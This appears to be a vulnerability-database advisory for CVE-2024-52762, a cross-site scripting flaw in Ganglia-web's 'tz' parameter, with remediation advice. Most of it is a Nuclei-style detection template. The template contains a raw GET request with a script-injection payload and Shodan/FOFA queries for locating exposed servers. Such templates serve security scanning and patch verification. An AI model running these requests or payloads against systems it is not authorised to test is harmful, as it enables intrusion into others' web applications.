CVE-2024-52762: Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Ganglia Web Interface | POC: 已公开

漏洞描述

A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter.

PoC代码[已公开]

id: CVE-2024-52762

info:
  name: Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript or HTML in victim browsers by injecting malicious payloads into the tz parameter.
  remediation: |
    Update Ganglia-web to version 3.7.7 or later to address the XSS vulnerability in the timezone parameter.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-52762
    cwe-id: CWE-79
    epss-score: 0.00336
    epss-percentile: 0.5585
    cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ganglia
    product: ganglia-web
    shodan-query: http.html:"ganglia_form.submit()"
    fofa-query: body="ganglia_form.submit()"
  tags: cve,cve2024,ganglia,xss,vuln

http:
  - raw:
      - |
        GET /ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>">'
          - 'ganglia'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4b0a00483046022100e3f3a4a54b5c4f0fdb422539f6ff4093b65e411b1adb46cf73ebb11e7cbd55760221009882fe3526e067df57a9f7cf1d73c4773da8629273cf68bbe6a43bda67abbf20:922c64590222798bb761d5b6d8e72950

相关漏洞推荐